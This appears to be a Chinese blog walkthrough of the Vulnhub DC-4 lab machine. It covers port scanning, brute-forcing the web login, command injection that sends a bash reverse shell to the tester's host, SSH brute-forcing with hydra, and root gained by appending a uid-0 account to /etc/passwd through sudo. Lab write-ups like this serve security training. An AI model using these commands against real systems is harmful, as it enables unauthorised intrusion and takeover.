Vulnhub DC_4

前言

vulnhub dc 4

https://www.vulnhub.com/entry/dc-4,313/

靶机IP

1
192.168.1.11

信息收集

1
nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt

image-20260220204937473

1
nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt 

image-20260220205234211

  • 操作系统:Linux 3.2 - 4.14(Debian)
  • 端口:22(OpenSSH 7.4p1),80(nginx 1.15.10)
1
gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
1
2
[08:11:16] 301 -  170B  - /css  ->  http://192.168.1.11/css/               
[08:11:23] 301 - 170B - /images -> http://192.168.1.11/images/

没有有用信息

暴力

80端口为登录框,源码无信息,尝试sql注入,失败

似乎只剩暴力这条路

image-20260220211529869

burp抓包发现是明文,但并没有账号或密码错误的回显

image-20260220212011032

尝试爆破
成功

image-20260220212533966

得到凭据

1
admin:happy

RCE

命令执行面板
image-20260220212745968

image-20260220212754417

抓包得到参数为执行的命令

1
radio=ls+-l&submit=Run

image-20260220212948761

反弹shell

1
2
3
curl -X POST http://192.168.1.11/command.php \
-H "Cookie: PHPSESSID=u8qlergatfe52bkor6q6iatcv1" \
-d "radio=bash -c 'bash -i >%26 /dev/tcp/192.168.1.17/6666 0>%261'&submit=Run"

image-20260220214117207

横向

1
find / -perm -4000 2>/dev/null

suid发现/home/jim/test.sh可疑文件并且权限为777

1
-rwsrwxrwx 1 jim jim 174 Apr  6  2019 /home/jim/test.sh    
1
2
3
4
5
6
# 1. 覆盖 test.sh
echo '#!/bin/bash' > /home/jim/test.sh
echo '/bin/bash' >> /home/jim/test.sh

# 2. 执行
/home/jim/test.sh

失败,还是www权限,但在jim家目录发现old-passwords.bak备份密码本

image-20260220215147275

保存下来爆破ssh

1
hydra -l jim -P pass.txt ssh://192.168.1.11

得到凭据

1
jim:jibril04

jim家目录下的mbox有查看权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

一封邮件,得到信息:

  • 邮件服务器:Exim 4.89
  • 发件人:root@dc-4
  • 收件人:jim@dc-4
  • 时间:2019年4月6日
  • 内容:仅测试消息

寻找邮件保存位置

image-20260220220110596

/var/spool/mail 找到jim邮件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

得到凭据

1
charles:^xHhA&hvim0y

teehee提权

登录charles用户

发现 /usr/bin/teehe 有sudo权限

gtfbins未搜到,查看该程序帮助

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
charles@dc-4:~$ /usr/bin/teehee  --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

可以追加文件,尝试追加/etc/passwd

创建hack用户

1
2
openssl passwd -1 -salt hack password
echo 'hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

成功,并得到flag

image-20260220222515160

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
888       888          888 888      8888888b.                             888 888 888 888 
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Vulnhub DC_4
http://xiaowu5.cn/2026/02/20/Vulnhub-DC-4/
作者
5
发布于
2026年2月20日
许可协议
BY XIAOWU